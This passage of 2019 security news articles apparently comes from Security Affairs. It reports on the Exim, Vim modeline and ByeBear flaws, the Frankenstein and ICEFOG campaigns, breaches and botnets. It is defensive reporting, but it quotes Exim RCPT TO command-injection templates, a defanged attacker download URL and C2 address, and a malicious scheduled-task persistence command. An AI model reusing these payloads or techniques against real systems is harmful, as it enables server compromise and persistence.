The certificate file appears as a Privacy-Enhanced Mail (PEM) format certificate, it is in the form of a PowerShell command instead of the X.509 TLS file format.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”

The command in the certificate file is used by crooks to download and execute another PowerShell script in memory. The script downloads and executes multiple files, including Sysupdate.exe (Monero miner), Config.json (configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script in memory), Sysguard .exe (watchdog for the miner process), and Clean.bat (deletes other components). 

Experts noticed that the update.ps1 file that contains the decoded certificate file is replaced with the new update.ps1 and a scheduled task is created to execute the new PowerShell script every 30 minutes.

The idea of hiding malware into certificate is not a novelty, experts at Sophos explored this technique in a proof of concept late last year.

“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date,”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2725, Oracle WebLogic)

The post CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign appeared first on Security Affairs.

CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system

Bad news for Linux users, a flaw tracked as CVE-2019-12735 allows to hack their systems by tricking them into opening a specially crafted file in Vim or Neovim Editor.

Security expert Armin Razmjou has recently found a high-severity vulnerability (CVE-2019-12735) in Vim and Neovim command-line text editing applications.

The vulnerability, tracked as CVE-2019-12735, is classified as an arbitrary OS command execution vulnerability. Both Vim and Neovim editing applications are pre-installed in Linux distros.

“Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file.” reads the security advisory published by the expert.

Vim is a highly configurable text editor for efficiently creating and changing any kind of text, including documents and scripts.

With 30% less source-code than Vim, the vision of Neovim is to enable new applications without compromising Vim’s traditional roles and enhancing the user experience

The vulnerability affects the way the Vim editor handles the “modelines” option. The modeline feature allows users to specify custom editor options near the start or end of a file (i.e. /* vim: set textwidth=80 tabstop=8: */). The feature is enabled by default and it is applied to all file types.

Only a subset of options is allowed in modelines, if an expression is included in the option value, it is executed in a sandbox.

Razmjou explained that it is possible to craft construct a modeline that execute the code outside the sandbox.

“However, the :source! command (with the bang [!] modifier) can be used to bypass the sandbox. It reads and executes commands from a given file as if typed manually, running them after the sandbox has been left.” continues the expert.

The expert demonstrated that by tricking a victim into opening a specially crafted file using Vim or Neovim it is possible to secretly execute commands on its Linux system and remotely take over it.

Razmjou published two proof-of-concept exploits to the public, one of which allows a remote attacker to gain access to a reverse shell.

“This PoC outlines a real-life attack approach in which a reverse shell is launched once the user opens the file. To conceal the attack, the file will be immediately rewritten when opened.” continues the post. “Also, the PoC uses terminal escape sequences to hide the modeline when the content is printed with cat. (cat -v reveals the actual content.)”

Below the video PoC of the attack:

CVE-2019-12735 Linux flaw

Vim and Neovim development teams already released security updates to address the CVE-2019-12735 flaw, Vim patch 8.1.1365 and Neovim patch (released in v0.3.6).

The expert also suggests to:

  • disable modelines feature,
  • disable “modelineexpr” to disallow expressions in modelines,
  • use “securemodelines plugin,” a secure alternative to Vim modelines.

Below the timeline of the flaw:

  • 2019-05-22 Vim and Neovim maintainers notified
  • 2019-05-23 Vim patch released
  • 2019-05-29 Neovim patch released
  • 2019-06-05 CVE ID CVE-2019-12735 assigned

Pierluigi Paganini

(SecurityAffairs – CVE-2019-12735, hacking)

The post CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system appeared first on Security Affairs.

Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed

Security expert discovered an exposed database belonging to Shanghai Jiao Tong University containing 8.4TB in email metadata.

Cloudflare Director of Trust & Safety Justin Paine discovered an unprotected database owned by Shanghai Jiao Tong University that was exposed online.

The Shanghai Jiao Tong University is considered one of the most prominent academic institution based in China.

The exposed database containing 8.4TB in email metadata was discovered on May 22, 2019, through a Shodan search. 

“While searching Shodan, I recently discovered an ElasticSearch database without any authentication. This database contained metadata related to a huge amount of emails. It was eventually confirmed that this server and the email metadata was controlled by a large university located in China.  ” wrote the expert on the rainbowtabl.es website. “9.5 billion rows of data which translates to 8.4TB of data.”

The unprotected database was active at the time of discovery, it was containing 9.5 billion rows and its size increased from 7TB on May 23 to 8.4TB on May 24.

Shanghai Jiao Tong University

The email metadata was generated by the popular open-source email solution named Zimbra

Based on the metadata, the expert was able to locate all email being sent or received by a specific individual. Exposed data also included the IP address and user agent of the person checking their email.

Paine reported the discovery to the University the day after the discovery, the institute quickly secured the archive in less than 24 hours.  

Below the timeline of the leak:

  • May 22, 2019 – Open ElasticSearch database discovered.
  • May 23, 2019 – Shanghai Jiao Tong University notified.
  • May 24, 2019 – ElasticSearch database secured.

Pierluigi Paganini

(SecurityAffairs – data leak, hacking)

The post Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed appeared first on Security Affairs.

Retro video game website Emuparadise suffered a data breach

Retro video game website Emuparadise revealed to have suffered a data breach that exposed 1.1 Million accounts back in April 2018.

Emuparadise is a website that offers tons of roms, isos and retro video games, users can download and play them with an emulator or play them with the web browser.

The security breach occurred in April 2018 and exposed account information for approximately 1.1 million Emuparadise forum members.

Since August 2018, Emuparadise no longer host game ROMs, anyway it continued to offer any kind of info for retro video games and operated community forums.

Emuparadise hacki

Over the weekend, some Emuparadise forum members reported to have received data breach notification notices from the popular services Have I Been Pwned and HackNotice. The notices notify them of the security breach and inform them that their data were exposed as part of the data breach that occurred in April 2018.

The notice issued by the service Have I Been Pwned states that 1,131,229 accounts from Emuparadise forums were exposed in an incident occurred in April 2018. The forums run on a vBulletin CMS, a very popular platform, but older versions are known to be vulnerable to several issues.

HIBP received the data from dehashed.com on June 9th, 2019, exposed info includes mail addresses, IP address, usernames and passwords stored as salted MD5 hashes.

“In April 2018, the self-proclaimed “biggest retro gaming website on earth”, Emupardise, suffered a date breach.” states Have I Been Pwned. “The compromised vBulletin forum exposed 1.1 million email addresses, IP address, usernames and passwords stored as salted MD5 hashes.

At the time of writing, it is not known how DeHashed obtained the huge trove of data.

Experts pointed out that Emuparadise data are offered for sale in the cybercrime underground and on hacking forums since early 2019.

Pierluigi Paganini

(SecurityAffairs – Emuparadise, hacking)

The post Retro video game website Emuparadise suffered a data breach appeared first on Security Affairs.

Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw

Microsoft is warning of an active spam campaign targeting European languages that leverages an exploit to infect simply by opening the attachment.

Microsoft issued a warning on Friday about an ongoing spam campaign that is targeting European users. Spam messages are carrying weaponized RTF documents that could infect users with malware without any user interaction, just opening the RTF documents.

Microsoft exploit RTF attachment

The spam messages are sent in various European languages, threat actors are exploiting the Microsoft Office and Wordpad CVE-2017-11882 vulnerability. The tech giant published a series of tweet warning of the spam campaign:

“In the new campaign, the RTF file downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload. The backdoor payload then tries to connect to a malicious domain that’s currently down.” warns Microsoft.

The CVE-2017-11882 flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.

Even if the flaw was patched in 2017, experts at Microsoft continue to see threat actors exploiting it in the wild, with a peak in the number of attacks leveraging the issue over the past few weeks.

“Notably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.” states Microsoft.

Once the RTF attachment is opened, it will execute multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload.

The payload used in this campaign is a backdoor attempt to connect to a malicious domain that is no longer accessible.

However, experts at Microsoft believe that attackers may use the same tactic to spread a new version of the backdoor that connects to an active C2.

Pierluigi Paganini

(SecurityAffairs – CVE-2017-11882, spam campaign)

The post Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw appeared first on Security Affairs.

Millions of Exim mail servers vulnerable to cyber attacks

Millions of Exim mail servers are exposed to attacks due to a critical vulnerability that makes it possible for unauthenticated remote attackers to execute arbitrary commands.

A critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

The vulnerability, tracked as CVE-2019-10149, resides in the deliver_message() function in /src/deliver.c and it is caused by the improper validation of recipient addresses. The issue could lead to remote code execution with root privileges on the mail server.

“In this particular case, RCE means Remote *Command* Execution, not Remote Code Execution: an attacker can execute arbitrary commands with execv(), as root; no memory corruption or ROP (Return-Oriented Programming) is involved.” reads the security advisory published by Qualys. “This vulnerability is exploitable instantly by a local attacker (and by a remote attacker in certain non-default configurations).”

The CVE-2019-10149 flaw was called ‘The Return of the WIZard,” a reference to Sendmail’s ancient WIZ and DEBUG vulnerabilities.

The flaw is easily exploitable by a local and a remote attacker in certain non-default configurations, experts believe that threat actors will start using it in attacks in the wild.

Experts explained that in order to remotely exploit this vulnerability in the default configuration, an attacker must keep a connection to the vulnerable server open for 7 days. It is necessary to transmit one byte every few minutes, however, the experts cannot guarantee that this exploitation method is unique.

Experts pointed out that the following non-default Exim configurations could be easily exploited by a remote attacker:

  • If the “verify = recipient” ACL was removed manually by an administrator (maybe to prevent username enumeration via RCPT TO), then our local-exploitation method also works remotely.
  • If Exim was configured to recognize tags in the local part of the recipient’s address (via “local_part_suffix = +* : -*” for example), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “balrog+${run{…}}@localhost” (where “balrog” is the name of a local user).
  • If Exim was configured to relay mail to a remote domain, as a secondary MX (Mail eXchange), then a remote attacker can simply reuse our local-exploitation method with an RCPT TO “${run{…}}@khazad.dum” (where “khazad.dum” is one of Exim’s relay_to_domains). Indeed, the “verify = recipient” ACL can only check the domain part of a remote address (the part that follows the @ sign), not the local part.

The CVE-2019-10149 flaw was addressed the Exim’s development team with the release of version 4.92 in February. Unfortunately, a large number of operating systems are still affected by the vulnerability.

Querying Shodan for vulnerable versions of Exim it is possible to find 4,353,180 installs most of them in the United States (2,462,098).

Exim flaw

Searching for patched Exim installs running the 4.92 release we can find 1,071,818 systems.

Pierluigi Paganini

(SecurityAffairs – Exim, hacking)

The post Millions of Exim mail servers vulnerable to cyber attacks appeared first on Security Affairs.

Security Affairs newsletter Round 217 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

ESET analyzes Turla APTs usage of weaponized PowerShell
Leicester City Football Club disclosed a card breach
ProtonMail denies that it spies on users for government agencies
Expert shows how to Hack a Supra Smart Cloud TV
Gaining Root Access to Host through rkt Container hack
Google is taking action on deceptive installation tactics for Chrome Browser Extensions
Google outages in Eastern US affected Gmail, G-Suite, YouTube, and more
Threat actors abuse Microsoft Azure to Host Malware and C2 Servers
A month later Gamaredon is still active in Eastern Europe
Australian teenager hacked into Apple twice for a job
CVE-2019-9510 flaw allows hackers to bypass Windows lock screen on RDP sessions
macOS zero-day in Mojave could allow Synthetic Clicks attacks
OilRigs Jason email hacking tool leaked online
BlackSquid malware uses multiple exploits to drop cryptocurrency miners
Expert developed a MetaSploit module for the BlueKeep flaw
NSA urges Windows Users and admins to Patch BlueKeep flaw
Tens of Million patients impacted by the AMCA data breach
The Australian National University suffered a major, sophisticated attack
0patch experts released unofficial Patch Available for Recent Windows 10 Task Scheduler Zero-Day
Analyzing the APT34s Jason project
Cisco disclosed several flaws in Cisco Industrial Network Director
Platinum APT and leverages steganography to hide C2 communications
Remote code execution flaw in Ministra IPTV Platform exposes user data and more
Tor Project released Tor Browser 8.5.1 for Windows, Mac, Linux, and Android
VMware addressed flaws in its Workstation and Tools
Crooks stole about $10 million from GateHub cryptocurrency wallet service
Cryptocurrency startup Komodo hacks itself to protect its users funds from hackers
Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know
New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers
SandboxEscaper releases Byebear exploit to bypass patched EoP flaw
Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks
Hunting the ICEFOG APT group after years of silence
Recently a large chunk of European mobile traffic was rerouted through China Telecom

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 217 – News of the week appeared first on Security Affairs.

Critical RCE affects older Diebold Nixdorf ATMs

Automated teller machine vendor Diebold Nixdorf has released security updates to address a remote code execution vulnerability in older ATMs.

Diebold Nixdorf discovered a remote code execution vulnerability in older ATMs and is urging its customers in installing security updates it has released to address the flaw.

The vulnerability affects older Opteva model ATMs, Diebold Nixdorf will start notifying the customers next week.

The group of security researchers NightSt0rm published technical details about the vulnerability in a blog post on Medium. The experts explained that had access to an ATM of Diebold vendor and started analyzing the machine a simple PC running Windows OS and exposing some services implemented by the ATM provider. The focused their analysis on the Spiservice service listening on post 8043.

“Look at the output of command, there is a service (Spiservice) which running on port 8043. The SpiService.exe is associated with XFS, the Extension for Financial Services DLL library (MSXFS.dll) that is specifically used by ATMs.” reads the post published by the experts. “The library provides a special API for the communication with the ATM’s PIN pad and the cash dispenser.”

The ATM tested by the expert is running Aglis XFS for Opteva version 4.1.61.1. Attempting to connect to the service via a web browser, experts noticed it calls many libraries, including a library called VDMXFS.dll.

According to Diebold Nixdorf, this service only runs on Opteva version 4.x software, successive versions are not affected.

The application use RemotingConfiguration.Configure and accepts “server.config” as a parameter used to load config. Analyzing the file, the experts discovered that the program uses the .NET Remoting technique. This technique allows different applications to communicate with each other. 

The researchers created two applications to remotely interact with the application and captured the network traffic, with this trick they found the application HTTP SOAP protocol used for the communication.

The ATM maker released Agilis XFS for Opteva – BulkCashRec (BCRM) version 4.1.22 that doesn’t expose the service’s configuration online.

The experts pointed out that this attack could be prevented by properly configuring the terminal-based firewall that is included in the older version of Opteve ATMs. the good news is that the firewall is enabled by default, this means that only ATM owners that disabled it are at risk.

The NightSt0rm team attempted to report the issue to Diebold Nixdorf but did not receive a reply.

At the time, there is not news of attacks in the wild that exploited this RCE flaw.

Pierluigi Paganini

(SecurityAffairs – Diebold Nixdorf, ATM)

The post Critical RCE affects older Diebold Nixdorf ATMs appeared first on Security Affairs.

Hunting the ICEFOG APT group after years of silence

A security researcher found new evidence of activities conducted by the ICEFOG APT group, also tracked by the experts as Fucobha.

Chi-en (Ashley) Shen, a senior security researcher at FireEye, collected evidence that demonstrates that China-linked APT group ICEFOG (aka Fucobha) is still active.

The activities of the APT group were first uncovered by Kaspersky Lab in September 2013, at the time the researchers defined the crew as an emerging group of cyber-mercenaries that was able to carry out surgical hit and run operations against strategic targets.  The cyber mercenaries were recruited by governments and private companies, it was composed of highly skilled hackers able to conduct sophisticated attacks.

The APT group is considered a persistent collector of sensitive information, Kaspersky team detected a series of attacks against the defense supply chain (e.g. Military contractors, shipbuilders, satellite operators, high-tech companies ) in Japan and South Korea.

The Icefog team also targeted companies in the energy industry in the US, threat actors used a custom backdoor dubbed “Fucobha”, which included exploits for both Microsoft Windows and Mac OS X.

At the time the “hit and run” nature of the operations appeared unusual, the attackers were processing victims rapidly, stealing only information of interest and showing a deep knowledge of the targets and the information they were searching for.

The group of hackers went dark just after the Kaspersky shared findings of its investigation in September 2013.

This week, Chi-en (Ashley) Shen presented at the CONFidence cybersecurity conference held in Poland her analysis on new samples of malware associated with the ICEFOG group.

Two of them, tracked as ICEFOG-P and ICEFOG-M, have been used in targeted attacks in 2014 and 2018, respectively. Some samples for both variants have been compiled between 2014 and 2019.

icefog

Both ICEFOG-P and ICEFOG-M are more complex of the original backdoor, a circumstance that suggests the threat actors have continued to develop and use it.

ICEFOG-M is the latest variant, it is a fileless malware that supports the same features of the ICEFOG-P but leverages HTTPs for communications.

The researchers explained that the ICEFOG-P variant is not particularly complex, it remained under the radar simply because was rarely used.

The researcher also spotted a Mac version of the malware, tracked as MacFog) that was unknown in the cyber security community. MacFog was initially distributed in Chinese forums

Unlike the operations observed between 2011 and 2013, the new malware variants were involved in multiple campaigns conducted by different groups,

Shen spotted variants of the ICEFOG malware in attacks targeting:

  • an unnamed agriculture company in Europe in 2015
  • government, media, and finance organizations in Russia and Mongolia in 2015 (TOPNEWS campaign)
  • the government of multiple former Soviet states in 2015 (Roaming Tiger)
  • Kazach officials in 2016 (APPER campaign)
  • water source provider, banks, and government entities in Turkey, India, Kazakhstan, Uzbekistan, and Tajikistan in 2018 (WATERFIGHT campaign)
  • an unknown entity in the Philippines in 2018 (PHKIGHT campaign)
  • organizations in Turkey and Kazakhstan in 2018 and 2019 (SKYLINE campaign)

In the latest campaign in 2019, tracked as SKYLINE Campaign, hackers targeted Turkey and Kazakhstan, the timestamp suggests the campaign might have been active at least since 2018. Attackers leveraged CVE 2017-11882 shared exploit template and used a fileless version of the ICEFOG-M.

icefog attacks timeline

According to Shen, most samples were mainly involved in cyber espionage campaign, threat actors appear to be politically motivated.

Below the conclusions of the excellent analysis conducted by Shen:

  • ICEFOG is malware shared among Roaming Tiger, APT15, Temp Group A and suspected APT9.
  • Shared malware is a pitfall for attribution, we should not do attribution only based on malware.
  • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to target Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey.
  • With the file-less ICEFOG-M, host-based detection for payloads are more difficult.
  • Continued development indicates there could be more attacks leveraging ICEFOG in future campaigns, and possibly leveraged by more attackers

Pierluigi Paganini

(SecurityAffairs – cyberespionage, hacking)

The post Hunting the ICEFOG APT group after years of silence appeared first on Security Affairs.

Recently a large chunk of European mobile traffic was rerouted through China Telecom

On June 6, for more than two hours China Telecom re-routed through its infrastructure a large chunk of European mobile traffic.

In November security researchers Chris C. Demchak and Yuval Shavitt published a paper that detailed how China Telecom has been misdirecting Internet traffic through China over the past years. The experts speculate that they were intentional BGP Hijacking attacks.

The term BGP hijacking is used to indicate the illegitimate takeover of groups of IP addresses by corrupting Internet routing tables maintained using the Border Gateway Protocol (BGP).

Now a new case sees the involvement of China Telecom, on June 6, for more than two hours a large chunk of European mobile traffic was rerouted through the infrastructure of ISP.

China Telecom Traffic Hijacking 3

China Telecom was a brand of the state-owned  China Telecommunications Corporation, but after marketization of the enterprise spin off the brand and operating companies as a separate group.

China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.

The last incident was caused by the propagation of routing announcements beyond the intended scope, so-called BGP route leak.

The BGP route leak involved the Swiss data center of the company Safe Host that accidentally leaked over 70,000 routes from its routing table to the Chinese ISP.

China Telecom did not discard the BGP leak, instead, it announced the Safe Host’s routes as its own routes, this means that all the traffic for many European mobile networks was re-routed through its network.

“Beginning at 09:43 UTC today (6 June 2019), Swiss data center colocation company Safe Host (AS21217) leaked over 70,000 routes to China Telecom (AS4134) in Frankfurt, Germany.” reads the analysis published by Oracle. “China Telecom then announced these routes on to the global internet redirecting large amounts of internet traffic destined for some of the largest European mobile networks through China Telecom’s network.”

Most impacted European networks included Swisscom (AS3303) of Switzerland, KPN (AS1130) of Holland, and Bouygues Telecom (AS5410) and Numericable-SFR (AS21502) of France.

The traffic was re-directed for over two hours and numerous leaked routes were more-specifics of routed prefixes, a circumstance that suggests the use of route optimizer technology.

Users of the affected mobile network experienced connection lagging and in some cases, they were not able to connect to some servers.

“Today’s incident shows that the internet has not yet eradicated the problem of BGP route leaks,” concludes Oracle.

“It also reveals that China Telecom, a major international carrier, has still implemented neither the basic routing safeguards necessary both to prevent propagation of routing leaks nor the processes and procedures necessary to detect and remediate them in a timely manner when they inevitably occur. Two hours is a long time for a routing leak of this magnitude to stay in circulation, degrading global communications.”

How to prevent such kind of attacks?

Security experts are pushing to adopt solutions to protect BGP, Cloudflare for example, sustains that Resource Public Key Infrastructure (RPKI) could secure BGP routing.

Pierluigi Paganini

(SecurityAffairs – BGP hijacking, China Telecom)

The post Recently a large chunk of European mobile traffic was rerouted through China Telecom appeared first on Security Affairs.

Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks

Cisco Talos experts uncovered a new wave of attacks tracked as Frankenstein campaign, attackers used tools built by combining four open-source techniques.

Security experts at Cisco Talos uncovered a series of highly targeted attacks, tracked as Frankenstein campaign, hackers used tools built by combining four different open-source techniques.

Attackers behind the Frankenstein campaign carried out several malware-based attacks between January and April 2019. Talos researchers discovered a low volume of documents in various malware repositories.

“Cisco Talos recently identified a series of documents that we believe are part of a coordinated series of cyber attacks that we are calling the Frankenstein campaign.” reads the analysis published by Cisco Talos. “We assess that this activity was hyper-targeted given that there was a low volume of these documents in various malware repositories. Frankenstein — the name refers to the actors’ ability to piece together several unrelated components — leveraged four different open-source techniques to build the tools used during the campaign.”

Researchers at Talos team believe the attackers are moderately sophisticated but highly resourceful.

The attackers used multiple anti-detection techniques such as checking to see if any analysis tools, such as Process Explorer, were running in the background and determining whether the malicious code was running in a virtualized environment.

Other anti-detection techniques such as only responding to GET requests that contained predefined fields, and using encryption to protect data in transit.

Talos experts identified two weaponized Word documents used in the Frankenstein campaign that were likely sent to the victims via emails. The first document named “MinutesofMeeting-2May19.docx“, displays the national flag of Jordan, once opened it will fetch a remote template and trigger the CVE-2017-11882 exploit to execute code on the target machine.

“Once the victim opens the document, it fetches a remove template from the actor-controlled website, hxxp://droobox[.]online:80/luncher.doc. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim’s machine. After the exploit, the file would run a command script to set up persistence as a scheduled task named “WinUpdate”.” continues the analysis. 

“/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR” That scheduled task would run a series of base64-encoded PowerShell commands that acted as a stager.”

frankenstein campaign

The second sample prompts the victim to enable macros and run a Visual Basic script. 

One of the documents detected by the experts appears as a document created by the security firm Kaspersky, in other two cases attackers used documents specifically designed to target Middle Eastern entities.

Experts also described a

In the second scenario observed by Talos, threat actors used a weaponized document. When the macro is enabled, it executes a Visual Basic Application (VBA) script implementing two anti-analysis features. 

The script first queries Windows Management Instrumentation (WMI) to check if specific applications are running: VMWare, Vbox, Process Explorer, Process Hacker, ProcMon, Visual Basic, Fiddler, and WireShark. Then the script checks if specific tasks are running: VMWare, Vbox, VxStream, AutoIT, VMtools, TCPView, WireShark, Process Explorer, Visual Basic, and Fiddler. 

If the script finds one of the above apps or tasks it halts its execution, otherwise it calls WMI and determines the number of cores allocated to the system and exits if the number of cores is less than two. 

Once the evasion checks were complete, the attackers used MSbuild to execute an actor-created file named “LOCALAPPDATA\Intel\instal.xml”. According to Talos, threat actors chose MSBuild because it is a signed Microsoft binary, this feature allows to bypass application whitelisting controls on the host when being used to execute arbitrary code. 

Attackers used a PowerShell Empire agent to gather information on the local system, including Username, Domain name, Machine name, Public IP address, administrative privileges, currently running processes, operating system version, and the security system’s SHA256 HMAC. 

Then the data is sent back to the C&C server via an encrypted channel.

“A campaign that leverages custom tools is more easily attributed to the tools’ developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the BlackEnergy malware.” Talos concludes. “By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence.”

Pierluigi Paganini

(SecurityAffairs – Frankenstein campaign, hacking)

The post Frankenstein campaign: threat actors put together open-source tools for highly-targeted attacks appeared first on Security Affairs.

SandboxEscaper releases Byebear exploit to bypass patched EoP flaw

SandboxEscaper publicly disclosed a second Windows zero-day exploit dubbed ByeBear to bypass a recently patched elevation of privilege issue.

SandboxEscaper is a well of neverending surprises, today publicly disclosed a second Windows zero-day exploit (dubbed ByeBear) to bypass a recently patched elevation of privilege issue.

SandboxEscaper is well-known researchers that publicly disclosed several zero-day exploits for unpatched Windows flaws. At the end of May, she disclosed four Microsoft zero-day flaws in just 24 hours.

One of the flaw could be exploited by an attacker to bypass an elevation of privilege issue in Windows. The flaw, tracked s CVE-2019-0841, was already patched by Windows, it affects the way Windows AppX Deployment Service (AppXSVC) handles hard links.

Evidently, the fix did not completely solve the problem because now SandboxEscaper has developed a new exploit to trigger the flaw bypassing the Microsoft security patch.

The researchers explained that a specially crafted malicious application could be used to escalate its privileges and take complete control of Windows machine.

Below a video PoC for the ByeBear exploit that abuses Microsoft Edge browser to write discretionary access control list (DACL) as SYSTEM privilege.

“It’s going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes, it means you either have 1 core or set your VM to have multiple processors instead of multiple cores… which will also cause it to lock up,” wrote SandboxEscaper.

“This bug is most definitely not restricted to the edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and closes it as soon as the bug completes.”

“I think it will also trigger by just launching edge once, but sometimes you may have to wait for a little. I didn’t do extensive testing…found this bug and quickly wrote up a PoC, took me like 2 hours total, finding LPEs is easy.”

In August 2018, SandboxEscaper disclosed a first zero-day privilege escalation vulnerability affecting Microsoft’s Windows operating systems.

In 2018, SandboxEscaper has publicly dropped exploits for other two Windows zero-day vulnerabilities forcing Microsoft to quickly address them to avoid its users being targeted by hackers.

In October, SandboxEscaper released the proof-of-concept exploit code for Microsoft Data Sharing that allowed a low privileged user to delete critical system files from Windows systems.

In December, she published a proof-of-concept (PoC) code for a new Windows zero-day, it is the fourth she released this year.

Microsoft plans to release it Patch Tuesday security updates for June on 11th June, and experts believe it will address this ByeBear zero-day and the four previous exploits disclosed by the expert.

Pierluigi Paganini

(SecurityAffairs – ByeBear, hacking)

The post SandboxEscaper releases Byebear exploit to bypass patched EoP flaw appeared first on Security Affairs.

Crooks stole about $10 million from GateHub cryptocurrency wallet service

Cyber criminals stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from the users of the GateHub cryptocurrency wallet service.

A new cyber heist made the headlines, crooks stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from the users of the GateHub cryptocurrency wallet service.

“Recently, we have been notified by our customers and community members about funds on their XRP Ledger wallets being stolen and immediately started monitoring network activity and conducted an extensive internal investigation.” reads a preliminary statement published by GateHub.

“Although we have not identified any action or omission by GateHub that may have facilitated or allowed this apparent theft to occur, we apologize deeply to all of our customers for this issue and pledge to get to the bottom of it.”

GateHub

The company pointed speculate the attackers might have abused API to steal the funds. GateHub explained that each API requests to the victim’s accounts were authorized with a valid access token. The company did not observe suspicious logins or evidence of brute force attacks, however, its staff noticed an increased amount of API calls using valid access tokens.

The suspicious requests were originated from a limited number of IP addresses likely compromised by the attackers. At the time, it is still unclear how the attackers have decrypted the secret keys. The company disabled all the access tokens on June 1st.

“We have however detected an increased amount of API calls (with valid access tokens) coming from a small number of IP addresses which might be how the perpetrator gained access to encrypted secret keys,” continues the statement.

“That, however, still doesn’t explain how the perpetrator was able to gain other required information needed to decrypt the secret keys. All access tokens were disabled on June 1st after which the suspicious API calls were stopped,”

The community member Thomas Silkjær who, one of members who warned GateHub about the theft, published a report on incident. that:

“On June 1 we were made aware of a theft of 201,000 XRP … and immediately started investigation. It turned out that the account robbed was managed through Gatehub.net, and that the offending account (r9do2Ar8k64NxgLD6oJoywaxQhUS57Ck8k) had stolen substantial amounts from several other XRP accounts, likely to be or have been managed through Gatehub.net.” reads the report.

The experts identified several other accounts connected to the cyber heists, for a total of 12 primary suspect accounts.

“From analysing access logs by victims and transactions made on the XRP ledger, it does not appear that any accounts were breached on gatehub.net directly, using client login credentials.” states the researcher.

The community member was not able to discover the root cause of the hack, it explored various options including repeating nonces, a bad practice in handling RippleTrade migration of user accounts, Browser client hacking, and also the leak of an old data base containing encrypted private keys.

GateHub immediately notified law enforcement, an investigation is still ongoing.

Pierluigi Paganini

(SecurityAffairs – hacking, GateHub)

The post Crooks stole about $10 million from GateHub cryptocurrency wallet service appeared first on Security Affairs.

New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers

A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

A new botnet tracked as GoldBrute has appeared in the threat landscape, it is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

The botnet is currently targeting over 1.5 million unique endpoints online, it is used to brute-force RDP connections or to carry out credential stuffing attacks.

“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shdoan lists about 2.4 million exposed servers  [1]. GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote the researchers Renato Marinho of Morphus Labs who discovered the bot.

The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333. 

Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.

“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.” 

GoldBrute botnet

Below the complete attack chain:

  • Botnet brute-forces RDP connection and gains access to a poorly protected Windows system.
  • It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
  • The bot will start to scan the internet for “brutable” RDP servers and send their IPs to the C2 that in turn sends a list of IP addresses to brute force.
  • GoldBrute bot gets different “host + username + password”  combinations.
  • Bot performs brute-force attack and reports result back to C2 server.

According to the researcher, the list of “brutable” RDP targets is rapidly growing, this suggests that also the size of the botnet is increasing.

“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.

